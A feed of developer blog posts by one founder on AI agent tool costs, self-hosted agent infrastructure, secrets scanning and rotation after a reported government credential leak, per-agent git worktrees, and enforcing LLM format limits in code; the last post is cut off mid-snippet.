DEV Community: Tobias Koehler

The Real Cost of AI Agents Is Not the Model Bill

Tobias Koehler — Mon, 06 Jul 2026 07:26:04 +0000

The language model call is predictable. You know the token count. You can estimate the cost. The surprise comes from everything the agent calls after the model responds. A single agent action can trigger an external API, a database write, a notification, a webhook, and a storage operation. Each one has its own cost curve. Some charge per call, some per record, some per gigabyte. When an agent loops or retries, every step multiplies.

Why Do AI Agent Bills Surprise People?

Most teams budget for the model. They forget the tools. An agent with access to a paid enrichment API, a CRM write endpoint, and a notification service can rack up charges across three vendors in one run. The model call might cost $0.02. The downstream tool calls cost $0.50. At scale, the model is a rounding error.

The failure mode is simple: an agent with no rate limit and a tool that charges per call is a slow money leak with no natural stopping point. The post on the cost of one unguarded AI API call covers this in detail. The short version is that retry logic without backoff turns a single failed call into five charged calls before the agent surfaces an error.

How Do You Audit Which Tools Your Agents Actually Use?

Start with the tool list, not the code. Most agent frameworks attach tools to an agent at initialization. Read that list. For each tool, answer three questions. Does this agent actually need this tool for its assigned task? What is the per-call cost, and what triggers a call? What happens if the agent calls this tool ten times in one run?

The third question catches the loops. An agent that retries a failing tool call without a circuit breaker will call that tool until something external stops it. Define what "external stops it" means before you find out the hard way.
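One way to make "external stops it" concrete is a per-run call cap on each tool. This is a minimal sketch, not a framework feature: the class names `ToolCallLimiter` and `ToolCallLimitExceeded` and the default cap of three are my own assumptions for illustration.

```python
class ToolCallLimitExceeded(RuntimeError):
    """Raised when a tool is called more often than its per-run cap allows."""


class ToolCallLimiter:
    """Counts calls per tool within one agent run and stops runaway loops."""

    def __init__(self, max_calls_per_tool: int = 3):
        # Hypothetical default; pick a cap per tool from your own audit.
        self.max_calls_per_tool = max_calls_per_tool
        self.calls: dict[str, int] = {}

    def record(self, tool_name: str) -> int:
        """Register one call; raise once the cap for this tool is exceeded."""
        count = self.calls.get(tool_name, 0) + 1
        if count > self.max_calls_per_tool:
            raise ToolCallLimitExceeded(
                f"{tool_name} hit the cap of {self.max_calls_per_tool} calls in one run"
            )
        self.calls[tool_name] = count
        return count
```

Call `record()` right before each tool invocation and create a fresh limiter per run. The point of the design is that the stop condition lives outside the agent's own retry logic.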

Tool sprawl accumulates faster than most teams expect, especially when agents are built incrementally or configured through an external platform. The post "Your AI agent has 87 tools you never approved" is a useful starting point for understanding how tool lists grow without explicit approval.

What Should an Agent Cost Per Run?

Define a budget per agent run before the agent runs in production. This is not a soft guideline. It is a hard ceiling: if the total cost of all tool calls in one run exceeds the ceiling, the run fails or alerts.

The ceiling forces a question the team usually skips: what is this agent actually worth per invocation? If an agent enriches a lead record, the ceiling should be well below what a converted lead is worth. Without an explicit answer, the ceiling defaults to infinity.
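A hard ceiling can be as small as a counter that refuses the next charge. The sketch below assumes you know, or can estimate, each tool call's cost before making it. `RunBudget` and `BudgetExceeded` are hypothetical names, and amounts are passed as strings so `Decimal` keeps the cents exact.

```python
from decimal import Decimal


class BudgetExceeded(RuntimeError):
    """Raised when a run's accumulated tool cost would pass the ceiling."""


class RunBudget:
    """Tracks spend for one agent run against a hard ceiling (in USD)."""

    def __init__(self, ceiling_usd: str):
        self.ceiling = Decimal(ceiling_usd)
        self.spent = Decimal("0")

    def charge(self, tool_name: str, cost_usd: str) -> Decimal:
        """Add one tool call's cost; refuse the call if it breaks the ceiling."""
        new_total = self.spent + Decimal(cost_usd)
        if new_total > self.ceiling:
            raise BudgetExceeded(
                f"{tool_name} would bring the run to ${new_total}, "
                f"over the ${self.ceiling} ceiling"
            )
        self.spent = new_total
        return self.spent
```

The check happens before the money is spent, so a run fails at the ceiling rather than just past it. Whether the handler aborts the run or only alerts is a decision for your own setup.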

Where Do Costs Hide in a Typical Stack?

The obvious costs are easy to spot. The hidden ones compound quietly until a billing alert fires at 3am. Here are the common hiding places:

Webhook fan-outs. An agent triggers a webhook. The webhook triggers three downstream services, each charging per invocation. The agent run cost looks normal. The downstream bill does not.
Retry logic without backoff. A tool call fails. The agent retries immediately, five times, before surfacing an error. Five calls charged instead of one.
Storage writes on every run. An agent writes intermediate state to object storage. The cost is small per write. At volume, it is not.
Third-party enrichment APIs. These often charge per record. An agent that calls an enrichment API for records it has already enriched is paying twice for the same data.
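For the retry item in particular, the usual remedy is a bounded number of attempts with a growing delay between them. This is a rough sketch under my own assumptions: the function names, the three-attempt default, and the doubling schedule are illustrative, and it retries on any exception, which a real tool wrapper would narrow.

```python
import time
from typing import Callable, TypeVar

T = TypeVar("T")


def backoff_delays(max_attempts: int, base_seconds: float = 1.0,
                   cap_seconds: float = 30.0) -> list[float]:
    """Delays between attempts: base, 2x base, 4x base, ... capped at cap_seconds."""
    return [min(cap_seconds, base_seconds * 2 ** i) for i in range(max_attempts - 1)]


def call_with_backoff(call: Callable[[], T], max_attempts: int = 3,
                      base_seconds: float = 1.0,
                      sleep: Callable[[float], None] = time.sleep) -> T:
    """Try `call` at most max_attempts times, waiting longer after each failure."""
    delays = backoff_delays(max_attempts, base_seconds)
    for attempt in range(max_attempts):
        try:
            return call()
        except Exception:
            if attempt == max_attempts - 1:
                raise  # out of attempts: surface the error instead of paying again
            sleep(delays[attempt])
    raise ValueError("max_attempts must be at least 1")
```

The `sleep` parameter exists only so the waiting can be swapped out in tests. The important property is the finite bound: the worst case is `max_attempts` charged calls, never an open-ended loop.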

How Do You Manage Secrets for Tools That Have Per-Call Costs?

Credential management and cost management are the same problem from different angles. An API key with no scope limit gives an agent the ability to call any endpoint that key can reach. A scoped key limits the blast radius of both a security incident and an unexpected billing event.

The post on secrets management for SaaS founders covers the credential side in depth. For cost auditing, the relevant principle is: credentials should be as narrow as the task requires.

What Is the Minimum Viable Cost Audit Before Launch?

A one-hour audit before you go to production is cheaper than the invoice after. Here is the minimum viable checklist:

Tool inventory. List every tool the agent can call. Remove any it does not need.
Per-call cost mapping. For each tool that calls an external service, find the pricing and note the per-call or per-record cost.
Loop and retry audit. Trace every path where the agent could call the same tool more than once. Verify each has a finite bound.
Ceiling definition. Set a maximum cost per run and a maximum run frequency. Alert if either is exceeded.
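The first three checklist items combine into one number: the worst-case cost of a single run. Here is a small sketch of that arithmetic. The tool names, prices, and call bounds in the example inventory are invented for illustration, not real vendor pricing.

```python
from decimal import Decimal


def worst_case_run_cost(tools: dict[str, tuple[str, int]]) -> Decimal:
    """Sum cost_per_call * max_calls_per_run over every tool in the inventory."""
    return sum(
        (Decimal(cost) * max_calls for cost, max_calls in tools.values()),
        Decimal("0"),
    )


# Hypothetical inventory: tool name -> (cost per call in USD, max calls per run).
inventory = {
    "enrichment_api": ("0.10", 3),
    "crm_write": ("0.02", 5),
    "notify": ("0.001", 10),
}
print(worst_case_run_cost(inventory))
```

If a tool has no finite `max_calls` you can write down, that is the loop and retry audit telling you where to look first. The result is also a sensible starting point for the per-run ceiling.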

This takes an hour the first time. It saves the kind of bill that requires an explanation to a co-founder or an investor.

Questions readers often ask

Do these cost risks apply to agents running on a fixed-price platform?

Partially. The platform bill may be fixed, but the tools the agent calls outside the platform are not. An agent that triggers an email send, a CRM update, and a Slack notification on every run is accumulating costs across three external services regardless of what the platform charges.

How often should you re-run the cost audit?

Any time the agent's tool list changes, the agent gains a new data source, or the run frequency increases. A quarterly review is a reasonable backstop if none of those events are tracked explicitly.

What is the simplest way to cap agent spend without a custom circuit breaker?

Most cloud services and API providers offer account-level spend alerts or hard caps. Set them at the service level, not just in the agent. A bug in the agent's retry logic cannot bypass a hard cap at the provider. Defense at multiple layers beats defense at one.

Should the cost audit happen before or after the security audit?

Run them together. The tool scope question is identical for cost and for security. Narrowing tool access reduces blast radius on both axes at once.

Jensen Says Every SaaS Becomes an Agent Company. I Built Mine for $45/Month on my VPS

Tobias Koehler — Mon, 06 Jul 2026 07:25:51 +0000

NVIDIA CEO Jensen Huang told the world at GTC 2025 that traditional software companies will evolve into agent platforms. He called it the shift from humans using software to AI agents using software on behalf of humans. That is not a research claim. It is a description of what is already happening in production systems.

I run two products on self-hosted infrastructure. ConnectEngine OS automates lead generation, content creation, and uptime monitoring. ProductShot generates AI product photography. Both products run agents that execute multi-step workflows without human intervention. The monthly infrastructure cost is roughly $45 USD. No venture capital. No cloud markup. Just a VPS, Docker containers, and agent orchestration built on n8n.

What Does Jensen Mean by Agent-First Software?

Huang's argument at GTC was structural, not speculative. SaaS requires a human to log in, click buttons, and execute tasks. Agents as a Service (AaaS) flips that model. The agent monitors your pipeline, identifies deals at risk, drafts outreach emails, updates the CRM, and flags the human only when judgment is required. The human becomes the exception handler, not the default operator.

This changes the economics of software. When an agent handles 10,000 tasks per month, you pay for compute and model inference, not 10,000 human hours. Pricing shifts from per-seat to per-task or per-outcome. Availability becomes continuous, around the clock, instead of limited to business hours. Scalability means spinning up more agents, not hiring more people.

NVIDIA positioned itself as the infrastructure layer underneath all of this. The company announced NIM (NVIDIA Inference Microservices), pre-packaged containers for running AI models in production. Enterprises can deploy customer-facing agents without managing model infrastructure. Huang also highlighted partnerships with Cadence, CrowdStrike, Dassault Systemes, Palantir, SAP, ServiceNow, Siemens, and Synopsys. These companies are building agents on NVIDIA infrastructure.

How ConnectEngine OS Implements the Agent Model

ConnectEngine OS runs three agent modules. LeadFlow discovers leads from Google Maps, Google Places, Etsy, and e-commerce stores. It scrapes business data, enriches contact information, and scores prospects based on website quality. ContentFlow generates platform-specific content from a single idea, rewrites it for blog, X, LinkedIn, Instagram, and Facebook, verifies claims against sources, and schedules publication. OpsFlow monitors uptime and sends Telegram alerts when sites go down.

These agents run continuously. LeadFlow fires on a schedule, finds new leads, and queues them for outreach. ContentFlow takes an idea, generates five platform-specific drafts, runs a verification pass, and publishes on schedule. OpsFlow pings monitored sites every few minutes and alerts immediately on failure. No human clicks a button to start these workflows. The agents execute autonomously.

The architecture is self-hosted n8n for workflow orchestration, Supabase for the database with Row Level Security enforced from day one, and Docker containers on a Hetzner VPS. Multi-tenancy is built into the schema. Each client's data is isolated via RLS policies. Credentials are stored in a vault with per-client API keys. Notifications route to Telegram or Slack depending on client preference.

Why Self-Hosting Beats Managed Platforms for Agent Infrastructure

The monthly cost for running both products is roughly $45 USD. That includes the VPS, offsite backups, and DNS. No per-execution fees. No per-seat licensing. No cloud markup on compute. The agent workflows run as often as needed without incrementing a bill.

Managed automation platforms charge per execution or per task. When an agent runs 10,000 operations per month, those fees compound. Self-hosting eliminates that variable cost. The infrastructure cost is fixed. The marginal cost of adding another workflow or another client is near zero.

Control is the other advantage. The n8n instance runs inside Docker on the VPS. Workflow JSON is versioned in git. Credentials are environment variables, never hardcoded. Backups run nightly to offsite storage. There is no vendor lock-in. The entire stack can be migrated to a different provider in hours if needed.

What the Shift to Agents Means for SaaS Founders

Huang's prediction is already visible in production systems. Salesforce ships Agentforce. ServiceNow ships AI agents. Vertical-specific platforms are selling agent capabilities as core features. The companies that adapt early will have a structural cost advantage over those that continue to sell per-seat software.

The technical barrier is lower than it appears. Open-source orchestration tools like n8n handle the workflow layer. Supabase provides a multi-tenant database with built-in auth and RLS. Claude and OpenAI provide the reasoning layer via API. The infrastructure cost is minimal if you self-host. The hard part is designing workflows that execute reliably without human intervention.

Start with one repeatable workflow. Identify a task your users perform manually every day. Build an agent that executes that task autonomously. Test it in production. Iterate until it runs without errors for a week straight. Then add the next workflow. Agent-first software is not a rewrite. It is an incremental shift from human-initiated actions to autonomous execution.

Questions readers often ask

Q: What is the difference between SaaS and Agents as a Service?

SaaS requires a human to log in and execute tasks. Agents as a Service means the agent performs the work autonomously and only escalates to a human when judgment is required. The pricing model shifts from per-seat to per-task or per-outcome.

Q: Can you build agent infrastructure without venture funding?

Yes. Self-hosted n8n on a VPS costs roughly $45 per month. Open-source tools handle orchestration, multi-tenancy, and auth. The marginal cost of adding workflows is near zero. Cloud platforms charge per execution, which compounds at scale.

Q: What is the biggest technical challenge in building agent workflows?

Reliability. Agents must execute without human intervention for days or weeks at a time. That requires error handling, retry logic, and monitoring at every step. The workflow must degrade gracefully when external APIs fail or rate limits are hit.

Q: How do you handle multi-tenancy in a self-hosted agent platform?

Row Level Security in Supabase isolates each client's data at the database level. Every query is scoped to the authenticated user's client ID. Credentials are stored in a per-client vault. Notifications route to the correct Telegram or Slack channel based on client configuration.

Q: What did Jensen Huang say about the future of enterprise software?

Huang said the era of humans using software is giving way to AI agents using software on behalf of humans. He positioned NVIDIA as the infrastructure layer for this shift and highlighted partnerships with SAP, ServiceNow, Palantir, and others building agents on NVIDIA infrastructure.

I'm rotating three of my own secrets this week. Three keys ended up where they didn't belong, I caught it fast, and I have a ...

Tobias Koehler — Sun, 07 Jun 2026 02:18:52 +0000

What finally made me stop procrastinating on it was reading about the CISA leak.

A contractor for the Cybersecurity and Infrastructure Security Agency maintained a public GitHub repository called "Private-CISA" that exposed administrative credentials to three AWS GovCloud accounts, dozens of plaintext passwords, and internal deployment configs [S1]. It was created on November 13, 2025, and stayed public until security researchers flagged it on May 15, 2026 [S1]. That's six months. This wasn't a sophisticated attack. Someone disabled GitHub's default secret detection, committed files named "importantAWStokens" and "AWS-Workspace-Firefox-Passwords.csv," and left them open to anyone with an internet connection [S1].

Guillaume Valadon from GitGuardian called it "the worst leak that I've witnessed in my career" [S1]. Philippe Caturegli from Seralys confirmed the credentials could authenticate to three AWS GovCloud accounts at a high privilege level and reach CISA's internal artifactory, the repository of every code package used to build their software. The keys stayed valid for 48 hours after the repo was taken offline.

If this can happen to a federal cybersecurity agency, it can happen to your SaaS. The difference is you don't have a security team to clean up after you. You have you, at night, rotating keys.

Why early-stage founders get this wrong

We treat secrets management as a future problem. You're shipping fast, the team is one or two people, everyone has admin anyway. A Stripe key in a .env file feels harmless when two people touch the codebase.

It doesn't stay harmless. Research cited by secrets management platforms found 96% of organizations have secrets scattered across code, config files, and multiple environments [S3]. Toyota, Mercedes-Benz, government institutions, and modern tech companies have all leaked credentials on GitHub [S2]. The CISA contractor used the repo as a working scratchpad, syncing backups and credentials across environments, and many passwords followed a pattern of the platform name plus the current year [S1]. Every one of those was a shortcut that felt reasonable in the moment and became indefensible once it was public.

For a SaaS holding customer data, a single leaked database credential or API key can mean direct access to production data, the ability to impersonate your app to third-party services, mandatory breach notifications, and the reputational hit that ends early traction. Organizations that automate detection cut breach costs by $1.9 million on average [S3]. I am not at that scale, and I still don't want to be the cautionary tweet.

Automated scanning is the cheapest thing you'll do all month

The CISA contractor explicitly disabled GitHub's default setting that blocks publishing keys in public repos [S1]. That's removing the safety from a loaded gun. Scanning tools exist to catch exactly this.

git-secrets, trufflehog, and GitGuardian scan repos for patterns that match API keys, tokens, certificates, and other credentials [S2]. Wired into your pipeline, they block commits with secrets before those commits ever reach the remote. Here's the basic setup I'd start with.

Install git-secrets locally:

git clone https://github.com/awslabs/git-secrets
cd git-secrets
make install

Wire it into your repo:

cd /path/to/your/repo
git secrets --install
git secrets --register-aws

That adds pre-commit hooks that scan for AWS credentials. Add custom patterns for broader coverage, then add a scanning step to your CI/CD pipeline so every pull request is checked and merges are blocked when a secret is found. The point is that it's automatic. Manual review fails because humans miss things when they're moving fast. I missed something when I was moving fast. That's the whole reason I'm writing this.
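To show what a pattern-based scanner does under the hood, here is a deliberately tiny sketch. It is not how git-secrets or trufflehog are implemented. The two patterns (the `AKIA` prefix of AWS access key IDs and PEM private key headers) are well-known shapes, while the names `SECRET_PATTERNS` and `find_secrets` are my own.

```python
import re

# Illustrative patterns only; real scanners ship far larger rule sets.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def find_secrets(text: str) -> list[tuple[int, str]]:
    """Return (line_number, pattern_name) for every line that matches a pattern."""
    hits = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((line_number, name))
    return hits
```

A hook built on this would exit non-zero whenever `find_secrets` returns anything. For real repositories I'd still reach for the maintained tools, because their rule sets cover far more than two patterns.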

Stop secrets from existing in your code at all

Scanning catches accidental commits. Proper storage means the secret was never in the code to begin with. The CISA repo held plaintext credentials in CSV files and config backups [S1]. Those should never be committed, even to a private repo.

Environment variables are the baseline. Instead of hardcoding a key in source, read it from process.env and keep the real value in a .env file that's listed in your .gitignore. That works locally but doesn't solve distribution: how do you get secrets to teammates, staging, and production without DMing them or committing them?
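The same baseline in Python, as a minimal sketch: read the value from the environment and fail loudly at startup if it is missing. `require_env` is a hypothetical helper and `STRIPE_SECRET_KEY` in the usage note is just an example variable name.

```python
import os


def require_env(name: str) -> str:
    """Read a secret from the environment and fail loudly if it is missing."""
    value = os.environ.get(name, "").strip()
    if not value:
        raise RuntimeError(f"Missing required environment variable: {name}")
    return value
```

Usage would look like `stripe_key = require_env("STRIPE_SECRET_KEY")` at application start. Failing early beats discovering an empty key on the first paid request.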

Secret management services. AWS Secrets Manager, Doppler, and similar tools encrypt secrets at rest, give you audit logs, and integrate with your deploys [S2] [S3]. Your app fetches them at runtime instead of you copying credentials onto every server. Credentials never touch your codebase or your laptop. And rotation, the thing I'm doing this week, becomes trivial: update the value in the manager, restart the app. No code change, no redeploy. If I'd had every one of these three keys behind a manager from the start, this week would be a thirty-second job instead of a careful, backup-first cycle.

For an early product this feels like overkill. It isn't. Setting up a secret manager takes an afternoon. Cleaning up a leak takes weeks and costs trust you can't spare.

The repo audit checklist I'm running on myself

If you've ever committed a secret, it's still in your Git history after you delete it. Every commit is permanent unless you explicitly remove it. Here's the checklist.

Scan the full history, not just current files, with trufflehog's git mode (its filesystem mode only looks at files on disk). Review the output for API keys, tokens, passwords, and connection strings.
Check for common secret files: .env variants, config.json, secrets.yml, credentials.csv, id_rsa, *.pem, *.key, and database backups (*.sql, *.dump).
Verify your .gitignore covers them (.env*, *.pem, *.key, secrets configs).
Rotate anything you find. If it was in history, assume it's compromised. The CISA keys stayed valid for 48 hours after the repo came down [S1]. That window is real, which is exactly why I'm doing my rotation with a backup in place instead of yanking everything at once.
Remove secrets from history with BFG Repo-Cleaner or git-filter-repo, then force-push and tell anyone with a local clone to re-clone.
Enable GitHub secret scanning. It scans public repos for known patterns automatically; turn it on for private repos too. The CISA contractor disabled it [S1]. Don't.
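The "common secret files" step is easy to script. This sketch takes a list of tracked paths, for example the output of git ls-files, and flags any whose file name matches the patterns from the checklist. `risky_files` and `SECRET_FILE_PATTERNS` are names I made up for the example.

```python
from fnmatch import fnmatch
from pathlib import PurePosixPath

# Patterns taken from the checklist above; extend them for your own stack.
SECRET_FILE_PATTERNS = [
    ".env*", "config.json", "secrets.yml", "credentials.csv",
    "id_rsa", "*.pem", "*.key", "*.sql", "*.dump",
]


def risky_files(paths: list[str]) -> list[str]:
    """Return the paths whose file name matches a known secret-file pattern."""
    return [
        path for path in paths
        if any(fnmatch(PurePosixPath(path).name, pattern)
               for pattern in SECRET_FILE_PATTERNS)
    ]
```

It only looks at names, not contents, so it complements a history scan rather than replacing one. Anything it flags that is already tracked should go through the rotate-and-remove steps.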

How any one of these would have stopped CISA

The breach was preventable at five separate points. If the contractor had left GitHub's secret detection on, the platform would have blocked the keys [S1]. If they'd used environment variables instead of committing CSVs, the credentials wouldn't have existed in the repo [S1]. If they'd stored secrets in a manager, the "importantAWStokens" file would have been unnecessary [S1]. A pre-commit hook would have caught it locally [S2]. A routine audit would have flagged the public repo [S3].

Caturegli identified the exposed artifactory credentials as a prime target for lateral movement and backdooring software packages [S1]. None of the fixes above need an enterprise budget or a security team. They need you to treat secrets as the high-value targets they are.

What this means if you hold customer data

Customers trust you with their data before you've earned it. One leaked credential that exposes user information ends that trust for good. SOC 2, GDPR, and HIPAA all require secure credential management [S3], so failing an audit because a key was committed to GitHub is an unforced error.

The good news: the work is front-loaded and cheap. Scanning tools are free. Secret managers have generous free tiers. You set it up once and maintain it as part of normal development.

The CISA repo was public for six months and granted admin access to federal cloud infrastructure [S1]. Your startup can't survive six days of that. I'm spending this week rotating three keys because I'd rather do the boring fix now than write the apology email later. If you've been putting your own rotation off, the CISA leak is your reminder too. See how I build ConnectEngine in the open.

Give Every AI Agent Its Own Git Worktree

Tobias Koehler — Sun, 07 Jun 2026 01:51:50 +0000

I ran five Claude Code agents in parallel one morning this week. By the time the dust settled I'd had three separate git collisions, one branch with two unrelated tabs' commits tangled together, and a recovery that needed a force-push I had to explicitly approve. Everyone's work survived. But the lesson cost me an hour I didn't plan to spend, and it comes down to a single file.
This is a follow-up to the seven-PRs-before-lunch morning. That post was the highlight reel. This one is the bug I hit running the same pattern without one rule in place.

The setup

The parallel-tab pattern looks like this: one coordinator tab holds the day's context and makes merge decisions, and several satellite tabs each carry one scoped piece of work. That morning I had five satellites going — Phase 2 of a content feature, Phase 3 of another, a Stripe doc fix, a Supabase security pass, and an investigation tab chasing a separate bug.
Two of those tabs were dispatched correctly: each got its own git worktree, a separate working directory linked to the same repository. The other three were not. They ran their git commands inside the shared main checkout, because the work seemed small enough not to bother.
That shortcut is where it went wrong.

What actually broke

Three collisions, in order:
One. A satellite tab made its first commit — and it landed on a different tab's branch. The other tab had run git checkout -b mid-task, which moved the shared HEAD, and the committing tab never knew. Recovery was a --mixed reset back to the right commit, then re-separating the branches. The misplaced work was preserved, but only because I caught it before pushing.
Two. The Stripe-fix tab ran git checkout -b fix/stripe-checklist-doc-rot and moved the shared HEAD again. The security tab's next commit then landed on the Stripe branch. The remote branch ended up with two unrelated commits stacked on it — the security work and the doc fix — entangled on a branch that was supposed to hold one trivial change. Untangling it needed:

git rebase --onto db0f96c 93d66ce
git push --force-with-lease

A force-push is destructive. My own rule is that those need an explicit go-ahead, so the recovery stopped and waited for me before it touched the remote.
Three. While recovering, the security tab had to inspect the Stripe tab's working tree just to understand what had gotten mixed in. Two agents reading each other's uncommitted state to reconstruct who did what.
None of this was the model being dumb. Every individual command was correct. The problem was the environment they all shared.

The technical heart: it's one file

Here's the whole thing in one sentence. .git/HEAD is a single file, and there's one of it per checkout.
Every tab that cds into the same directory reads and writes that same file. So:

Tab A runs git checkout branch-a. HEAD now points at branch-a.
Tab B, in a different terminal but the same directory, runs git status. It sees branch-a — not whatever it thinks it's on.
Tab B commits. The commit lands on branch-a.

There's no exotic race condition here. It's git working exactly as designed. A checkout is shared mutable state, and I had five agents writing to it concurrently. Parallel processes plus shared mutable state is the oldest bug in the book; I'd just never hit it with git because humans don't usually run five checkouts in one directory at the same time.
Git already ships the fix. Worktrees give each agent its own working directory and its own HEAD, all linked to the same object store:

git worktree add ../wt-stripe-fix -b fix/stripe-checklist-doc-rot origin/main

Now that tab has a private directory, a private HEAD, and a private checked-out branch. It cannot move another tab's HEAD because it isn't touching the same one. The two tabs I had set up with worktrees that morning had zero collisions. The tabs I hadn't set up that way accounted for all three.
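Isolation like this can also be verified mechanically before an agent commits anything. Below is a minimal sketch that asks git for the top-level directory and checks its name. It assumes worktree directories follow the wt- naming used in the command above; the function names and the example paths in the usage note are hypothetical.

```python
import subprocess
from pathlib import Path


def is_isolated_worktree(toplevel: str, prefix: str = "wt-") -> bool:
    """True when the checkout's top-level directory is named like a private worktree."""
    return Path(toplevel).name.startswith(prefix)


def current_toplevel() -> str:
    """Ask git for the top-level directory of the checkout we are standing in."""
    result = subprocess.run(
        ["git", "rev-parse", "--show-toplevel"],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()
```

An agent's first step could then be `if not is_isolated_worktree(current_toplevel()): raise SystemExit("shared worktree detected")`. A path such as /home/dev/wt-stripe-fix passes, while the main checkout's path does not.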

The numbers

Metric	That morning
Parallel agents running	5
Tabs given their own worktree	2
Tabs sharing the main checkout	3
Collisions from the isolated tabs	0
Collisions from the shared tabs	3
Recoveries needing a force-push	1

The split is the entire argument. Zero from isolation, three from sharing. There was no middle ground and no "it's a small change so it's fine."

The rule

So the rule is now absolute, and it has no exceptions:
Every satellite agent gets its own git worktree. No exceptions — not even a three-line doc fix.
The Stripe fix that caused collision two was a three-line doc fix. That's exactly why "this one's too small to bother" is the trap. The size of the change has nothing to do with it. The git checkout -b moves the shared HEAD whether the diff is three lines or three hundred.
Two mechanical guardrails enforce it now:

The coordinator's dispatch prompt always includes a worktree-setup block with the exact git worktree add command. The agent doesn't get to decide whether it needs one.
Every satellite's first step is git rev-parse --show-toplevel. If that returns the shared main path instead of its own wt-* directory, the agent halts and says "shared worktree detected" before it commits anything.

The check is a few seconds. The collision it prevents is an hour.
The coordinator tab itself stays in the main checkout. That's safe, because the coordinator's job is merging and docs, and it never creates feature branches there. Isolation is for the tabs doing branch work.
This is the same shape as a lesson I keep relearning: a rule that lives only as good intentions gets violated the moment something seems small. The fix is never "remember to be careful." It's to make the safe path the only path the tooling offers. That's why the dispatch prompt carries the command and the first step is a hard check: the discipline moved out of my memory and into the process, the same way I moved my whole operating manual from prose into structure a couple of weeks back.

The pattern, if you're running parallel agents

One worktree per agent, always. git worktree add ../wt-<name> -b <branch> origin/main. The shared store keeps it cheap; the separate HEAD keeps them from fighting.
Make the first action a location check. git rev-parse --show-toplevel as step one. Wrong directory means halt, not proceed-and-hope.
Clean up at the end. git worktree remove and git branch -D once merged, so the next session starts clean.

Running agents in parallel multiplies your throughput. It also multiplies every shared-state bug you'd never trip as a single human at a single checkout. The worktree isn't an optimization. It's the isolation boundary that makes the parallelism safe at all. Five agents, one HEAD, three collisions. Five agents, five HEADs, zero. Give every agent its own worktree.

I build ConnectEngine OS in production, in public, most mornings. The scan tool is free if you want to see what it does.

You Can't Prompt Your Way Out of a Hard Constraint

Tobias Koehler — Fri, 29 May 2026 08:24:15 +0000

Thursday morning I removed five nodes from my content pipeline. By lunch I understood something about building with language models that eleven failed edits had been trying to teach me all week: when a rule absolutely has to hold, you don't write the rule into the prompt. You enforce it in code.
This is a field report from the inside of the AI content engine I built in n8n. It's not a hot take about prompt engineering. It's the specific, expensive way I learned where prompts stop working — and what to do instead.

The setup

ConnectEngine OS has a module called ContentFlow. You give it a topic, it grounds itself in real sources, and it writes platform-specific posts: a blog draft, a LinkedIn version, an X version, Facebook, Instagram, plus a matching image prompt. One idea in, six shaped outputs out.
For weeks there had been a verifier stage in the middle — a fact-check node that re-read every claim against the cited sources. It was slow and it was noisy, so on Thursday I split it out and removed it from the generation path. The workflow went from 36 nodes to 31. Cleaner. Faster.
Then I regenerated an idea to smoke-test the change, and every platform output came back wrong.
X was over 5,000 characters against a 270-character limit. LinkedIn and Instagram had markdown # headers that those platforms explicitly don't render. Everything read like a blog post regardless of which platform it was for. The image prompt field was stuffed with the article body instead of a visual description. When I checked the backlog, 21 of 45 ideas were affected: 47% of everything in the pipeline.
My first reaction was the wrong one: what did removing the verifier break?

The technical heart

It hadn't broken anything. The verifier removal was innocent. What it did was stop hiding a bug that had been there the whole time.
Here's the part that matters. The node that calls the model assembles a system prompt that's roughly 49KB. That's not a typo. It's the platform's format rules, plus the full grounding context — the primary source (~6KB), three separate search-result bodies (~4KB each), the citation-formatting rules, the founder voice profile, and the per-platform instructions. All concatenated into one instruction block.
Inside that 49KB sits a single line that says, in effect, "X posts must be under 270 characters, no markdown headers." And the model ignores it.
Not maliciously. The grounding context is the overwhelming bulk of those tokens, and it's full of concrete, specific article content. A single formatting sentence floating in that ocean doesn't get the model's attention. The signal is swamped.
The actual root cause was even more direct: an upstream node was writing each idea's raw_idea as an imperative instruction ("write a comprehensive guide to..."), and that instruction was passed verbatim into the user message. The model obeyed the imperative it was handed over the format rules buried in the system prompt. Same story for the image prompt — it was told to write an article, so it wrote an article into the image field.

Eleven edits, and a pattern I couldn't ignore

So I did what most people do. I tried to fix it with better instructions.

| Fix attempt | Mechanism | Outcome |
|---|---|---|
| Topic-reframe in the user message | prompt | Partial — stopped the imperative echo, lengths still wrong |
| End-of-prompt "final reminder" with hard char limits | prompt | Partial — LinkedIn 4550 → 2896, Facebook 1789 → 691, but X and LinkedIn still over |
| "Default to a single tweet, not a thread" rule | prompt | Ignored — still produced a 3-tweet thread |
| "Don't write source stories in the first person" rule | prompt | Ignored — still wrote a borrowed "$257/month" story as mine |
| Re-splitter: break long output into ≤270-char tweets at sentence boundaries | code | Works — X is postable no matter what the model emits |
| Character gate with an X exemption | code | Works |
| Brand-aware image fallback (read brand config, build the prompt from a template) | code | Works — images stay on-brand even when generation misfires |
| Image guard: discard anything with # headers or over 400 chars | code | Works — article bodies never reach the image field |
Read that table top to bottom. Every prompt-level fix was partial or flatly ignored. Every code-level fix worked the first time and kept working.
By the eleventh edit I stopped pretending the next instruction would be the one that stuck. The lesson wasn't "write the rule more forcefully." The lesson was that I'd been using the wrong tool for the job.
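
As a rough illustration of the re-splitter row in the table, a minimal TypeScript sketch follows. It is not the code running in the pipeline: the names `splitSentences` and `resplit`, the sentence-ending heuristic, and the hard-slice fallback for overlong words are all assumptions. The only details taken from the table are the 270-character ceiling and the preference for sentence boundaries.

```typescript
// Hypothetical re-splitter: names and heuristics are illustrative assumptions.
const TWEET_LIMIT = 270;

// Count Unicode code points rather than UTF-16 code units.
function countCodePoints(text: string): number {
  return Array.from(text).length;
}

// Group whitespace-separated words into sentences; a word ending in
// ., ! or ? (optionally followed by a closing quote or bracket) ends one.
function splitSentences(text: string): string[] {
  const sentences: string[] = [];
  let words: string[] = [];
  for (const word of text.trim().split(/\s+/)) {
    if (word === "") continue;
    words.push(word);
    if (/[.!?]["')\]]?$/.test(word)) {
      sentences.push(words.join(" "));
      words = [];
    }
  }
  if (words.length > 0) sentences.push(words.join(" "));
  return sentences;
}

// Pack sentences greedily into chunks of at most `limit` code points.
function resplit(text: string, limit: number = TWEET_LIMIT): string[] {
  const chunks: string[] = [];
  let current = "";
  const flush = (): void => {
    if (current !== "") chunks.push(current);
    current = "";
  };
  // Try to append a unit to the current chunk; report whether it fit.
  const add = (unit: string): boolean => {
    const candidate = current === "" ? unit : `${current} ${unit}`;
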